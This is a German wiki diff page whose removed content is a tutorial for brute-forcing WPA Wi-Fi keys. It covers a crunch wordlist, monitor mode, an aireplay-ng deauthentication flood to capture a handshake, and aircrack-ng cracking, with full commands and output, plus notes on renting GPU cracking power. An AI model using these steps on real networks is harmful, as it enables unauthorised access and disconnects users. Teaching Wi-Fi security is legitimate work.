Wlan Bruteforce Attacke: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde geleert.)
Markierung: Geleert
 
(60 dazwischenliegende Versionen von 2 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
=vorgehen=
 
#Passwort liste generieren
 
#Interface suchen
 
#Interface Monitor mode
 
#Prozesse die stören killen
 
#Wlans anzeigen
 
#capture AP
 
#auf Client Handshake warten (eventuell Verbindung killen)
 
#Brute Force auf Datei starten
 
#Erfolg
 
  
 
 
=passwordlist generieren=
 
*crunch  8 8 0123456789 -o password.lst
 
<pre>
 
Crunch will now generate the following amount of data: 900000000 bytes
 
858 MB
 
0 GB
 
0 TB
 
0 PB
 
Crunch will now generate the following number of lines: 100000000
 
 
crunch:  19% completed generating output
 
 
crunch:  38% completed generating output
 
 
crunch:  58% completed generating output
 
 
crunch:  76% completed generating output
 
 
crunch:  95% completed generating output
 
 
crunch: 100% completed generating output
 
</pre>
 
=list=
 
*airmon-ng
 
<pre>
 
PHY Interface Driver Chipset
 
 
phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)
 
phy1 wlan1 rtl8192cu Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
 
</pre>
 
=monitor modus=
 
*airmon-ng start wlan1
 
airmon-ng start wlan1
 
<pre>
 
Found 5 processes that could cause trouble.
 
If airodump-ng, aireplay-ng or airtun-ng stops working after
 
a short period of time, you may want to kill (some of) them!
 
 
  PID Name
 
  618 NetworkManager
 
  712 wpa_supplicant
 
  825 avahi-daemon
 
  826 avahi-daemon
 
1520 dhclient
 
 
PHY Interface Driver Chipset
 
 
phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)
 
phy1 wlan1 rtl8192cu Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
 
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
 
(mac80211 station mode vif disabled for [phy1]wlan1)
 
</pre>
 
=killen der problem prozesse=
 
*kill -9 618
 
*kill -9 712
 
*kill -9 825
 
*kill -9 826
 
*kill -9 1520
 
 
=checken=
 
*airmon-ng check wlan1mon
 
No interfering processes found
 
*falls noch was gestartet
 
 
systemctl disable avahi-daemon
 
 
service network-manager stop
 
 
=dump=
 
Wir suchen nach der BSSID von dd-wrt
 
*airodump-ng wlan1mon
 
[[Datei:wlan1mon1.jpg]]
 
 
=handshake besorgen=
 
*BSSIDCLIENT=44:74:6C:54:68:E8 # Wird später gebraucht
 
*BSSIDAP=00:18:F8:DA:F7:94
 
*airodump-ng --bssid $BSSIDAP -c 6 -w wlan.cap wlan1mon
 
[[Datei:wlan1mon2.jpg]]
 
 
==zweites fenster öffnen==
 
*aireplay-ng -0 50 -a  00:18:F8:DA:F7:94 -c 44:74:6C:54:68:E8 wlan1mon
 
<pre>
 
11:02:39  Waiting for beacon frame (BSSID: 00:18:F8:DA:F7:94) on channel 6
 
11:02:39  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 4 ACKs]
 
11:02:40  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 6 ACKs]
 
11:02:40  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 8 ACKs]
 
11:02:41  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 7 ACKs]
 
11:02:44  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|43 ACKs]
 
11:02:49  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [36|68 ACKs]
 
11:02:55  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
 
11:03:00  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
 
11:03:05  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
 
11:03:10  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
 
11:03:15  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
 
11:03:21  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 4|65 ACKs]
 
11:03:26  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
 
11:03:32  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|61 ACKs]
 
11:03:37  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|65 ACKs]
 
11:03:42  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|63 ACKs]
 
11:03:47  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
 
11:03:52  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
 
11:03:57  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [26|67 ACKs]
 
11:04:02  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
 
11:04:07  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
 
11:04:12  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
 
</pre>
 
bis der client rausfliegt
 
 
=nach dem wiederverbinden kommt der handshake=
 
[[Datei:wlan1mon3.jpg]]
 
==handshake==
 
00:18:F8:DA:F7:94
 
 
=cracken=
 
*aircrack-ng -w password.lst -b  00:18:F8:DA:F7:94  wlan.cap-01.cap
 
[[Datei:wlan1mon4.jpg]]
 
=Crack geschwindigkeiten=
 
Laptop Schaft circa 1000 Keys pro Sekunde
 
 
eine starke Grafikkarte (Titan XP) schaft 520000 hash/s
 
 
Bei bedarf kann man sich auch online Rechen power mieten
 
 
https://www.gpuhash.me/?menu=en-tasks
 
 
oder sich ein Cluster aus mehreren Grafikkarten bauen
 
 
 
Quelle http://www.crackingservice.com/?q=node/20
 

Aktuelle Version vom 7. Juni 2021, 16:48 Uhr

Abgerufen von „http://wiki.ixheim.de/index.php?title=Wlan_Bruteforce_Attacke&oldid=23484